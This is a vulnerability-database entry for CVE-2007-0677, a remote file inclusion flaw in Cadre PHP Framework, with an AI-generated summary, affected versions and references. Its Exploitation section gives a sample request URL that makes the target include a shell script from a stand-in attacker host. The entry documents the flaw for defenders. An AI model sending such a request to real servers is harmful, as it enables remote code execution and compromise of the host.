CVE-2007-0677
Description
PHP remote file inclusion vulnerability in fw/class.Quick_Config_Browser.php in Cadre PHP Framework 20020724 allows remote attackers to execute arbitrary PHP code via a URL in the GLOBALS[config][framework_path] parameter.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
PHP remote file inclusion in Cadre PHP Framework 20020724 allows arbitrary code execution via the GLOBALS[config][framework_path] parameter.
Vulnerability
A PHP remote file inclusion vulnerability exists in fw/class.Quick_Config_Browser.php of Cadre PHP Framework version 20020724. The script unsafely uses include_once($GLOBALS[config][framework_path] . "class.Browser.php");, allowing an attacker to control the included file by supplying a URL via the GLOBALS[config][framework_path] parameter [1][2]. No authentication or special configuration is required to reach the vulnerable code path.
Exploitation
An attacker can exploit this by sending a crafted HTTP GET request to the vulnerable script. The parameter GLOBALS[config][framework_path] is set to a URL pointing to a malicious PHP script hosted on an attacker-controlled server. For example: http://target/cadre/fw/class.Quick_Config_Browser.php?GLOBALS[config][framework_path]=http://attacker/shell.php? [1][2]. The attacker does not need any prior access or authentication; the vulnerability is remotely exploitable over the network.
Impact
Successful exploitation allows the attacker to execute arbitrary PHP code on the target server with the privileges of the web server process. This can lead to full compromise of the application and underlying system, including data theft, file manipulation, and further lateral movement [1][2].
Mitigation
No official patch or fixed version has been released for Cadre PHP Framework 20020724. The project appears to be unmaintained; users should consider migrating to an alternative framework or removing the vulnerable component entirely. No workaround is available that does not involve code modification [1][2].
AI Insight generated on May 24, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2- cpe:2.3:a:cronosys:cadre_php_framework:22020724:*:*:*:*:*:*:*
- Range: = 20020724
Patches
0No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
8- echo.or.id/adv/adv63-y3dips-2007.txtnvdExploit
- www.securityfocus.com/bid/22336nvdExploit
- osvdb.org/33631nvd
- securityreason.com/securityalert/2215nvd
- www.securityfocus.com/archive/1/458681/100/0/threadednvd
- www.vupen.com/english/advisories/2007/0449nvd
- exchange.xforce.ibmcloud.com/vulnerabilities/32005nvd
- www.exploit-db.com/exploits/3237nvd
News mentions
0No linked articles in our index yet.